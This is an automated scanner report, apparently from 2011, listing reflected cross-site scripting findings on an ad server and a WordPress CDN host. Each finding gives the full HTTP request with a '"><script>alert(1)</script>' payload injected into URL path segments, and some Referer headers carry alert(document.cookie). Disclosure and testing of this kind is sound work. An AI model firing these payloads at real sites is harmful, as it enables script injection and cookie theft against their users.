HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:27 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 346 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d062c"><script>alert(1)</script>ca4abf2e429 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominosd062c"><script>alert(1)</script>ca4abf2e429/11Q2/CPC/728/11959749775@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:29 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 345 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90454"><script>alert(1)</script>2d82bb5a239 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q290454"><script>alert(1)</script>2d82bb5a239/CPC/728/11959749775@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:31 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 345 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284b4"><script>alert(1)</script>d510252fe66 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC284b4"><script>alert(1)</script>d510252fe66/728/11959749775@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:33 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 346 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed4d2"><script>alert(1)</script>1a64d0928f4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/728ed4d2"><script>alert(1)</script>1a64d0928f4/11959749775@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:35 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 345 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 764de"><script>alert(1)</script>9f3a5ed7d4b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/728/11959749775@x90764de"><script>alert(1)</script>9f3a5ed7d4b HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; id=914804995789526
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:03:37 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 338 Content-Type: text/html Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/;httponly
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c5f0"><script>alert(1)</script>f92225dbdf6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B38c5f0"><script>alert(1)</script>f92225dbdf6/Dominos/11Q2/CPC/728/1849951236@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:48 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 345 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff03f"><script>alert(1)</script>e08fcce560c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominosff03f"><script>alert(1)</script>e08fcce560c/11Q2/CPC/728/1849951236@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:50 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 344 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56e9"><script>alert(1)</script>e3257083564 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2f56e9"><script>alert(1)</script>e3257083564/CPC/728/1849951236@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:52 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 345 Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 232e4"><script>alert(1)</script>518b442c3c0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC232e4"><script>alert(1)</script>518b442c3c0/728/1849951236@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:54 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 346 Content-Type: text/html
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ce9"><script>alert(1)</script>6f09d14ccb6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/728c9ce9"><script>alert(1)</script>6f09d14ccb6/1849951236@x90 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:56 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 346 Content-Type: text/html
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a008"><script>alert(1)</script>f83aab5e457 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/247B3/Dominos/11Q2/CPC/728/1849951236@x901a008"><script>alert(1)</script>f83aab5e457 HTTP/1.1 Host: b3.mookie1.com Proxy-Connection: keep-alive Referer: http://redcated/APM/iview/142856423/direct;wi.728;hi.90/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate= User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW802rT5oABV/F; NSC_o4efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; Dominos=247B3; id=914804995789526; session=1303242610|1303242619
Response
HTTP/1.1 200 OK Date: Tue, 19 Apr 2011 20:06:58 GMT Server: Apache/2.2.3 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 335 Content-Type: text/html
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2828"><script>alert(1)</script>eab5008b54d was submitted in the REST URL parameter 1. This input was echoed as e2828\"><script>alert(1)</script>eab5008b54d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1648a"><script>alert(1)</script>480ef64af3a was submitted in the REST URL parameter 5. This input was echoed as 1648a\"><script>alert(1)</script>480ef64af3a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c916"><script>alert(1)</script>97b02068444 was submitted in the REST URL parameter 1. This input was echoed as 1c916\"><script>alert(1)</script>97b02068444 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content1c916"><script>alert(1)</script>97b02068444/plugins/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77cc0"><script>alert(1)</script>a500ca9f17c was submitted in the REST URL parameter 2. This input was echoed as 77cc0\"><script>alert(1)</script>a500ca9f17c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins77cc0"><script>alert(1)</script>a500ca9f17c/amr-ical-events-list/css/icallist.css?ver=1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c461c"><script>alert(1)</script>81ebd71ba86 was submitted in the REST URL parameter 5. This input was echoed as c461c\"><script>alert(1)</script>81ebd71ba86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/amr-ical-events-list/css/icallist.cssc461c"><script>alert(1)</script>81ebd71ba86?ver=1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d47c"><script>alert(1)</script>cccc92e06a7 was submitted in the REST URL parameter 1. This input was echoed as 6d47c\"><script>alert(1)</script>cccc92e06a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content6d47c"><script>alert(1)</script>cccc92e06a7/plugins/amr-ical-events-list/css/icalprint.css?ver=1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1507c"><script>alert(1)</script>38cdb41f31a was submitted in the REST URL parameter 2. This input was echoed as 1507c\"><script>alert(1)</script>38cdb41f31a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins1507c"><script>alert(1)</script>38cdb41f31a/amr-ical-events-list/css/icalprint.css?ver=1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64300"><script>alert(1)</script>a237d15471e was submitted in the REST URL parameter 5. This input was echoed as 64300\"><script>alert(1)</script>a237d15471e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/amr-ical-events-list/css/icalprint.css64300"><script>alert(1)</script>a237d15471e?ver=1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2db02"><script>alert(1)</script>561302ac03e was submitted in the REST URL parameter 1. This input was echoed as 2db02\"><script>alert(1)</script>561302ac03e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content2db02"><script>alert(1)</script>561302ac03e/plugins/grunion-contact-form/css/grunion.css?ver=3.1.1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43df5"><script>alert(1)</script>8ce814d076d was submitted in the REST URL parameter 2. This input was echoed as 43df5\"><script>alert(1)</script>8ce814d076d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins43df5"><script>alert(1)</script>8ce814d076d/grunion-contact-form/css/grunion.css?ver=3.1.1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd478"><script>alert(1)</script>dd6edca9943 was submitted in the REST URL parameter 5. This input was echoed as bd478\"><script>alert(1)</script>dd6edca9943 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content/plugins/grunion-contact-form/css/grunion.cssbd478"><script>alert(1)</script>dd6edca9943?ver=3.1.1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cc84"><script>alert(1)</script>24036739709 was submitted in the REST URL parameter 1. This input was echoed as 9cc84\"><script>alert(1)</script>24036739709 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content9cc84"><script>alert(1)</script>24036739709/plugins/sidebar-login/style.css?ver=3.1.1 HTTP/1.1 Host: digibond.wpengine.netdna-cdn.com Proxy-Connection: keep-alive Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ed3"><script>alert(1)</script>ff23996d7ad was submitted in the REST URL parameter 2. This input was echoed as 21ed3\"><script>alert(1)</script>ff23996d7ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
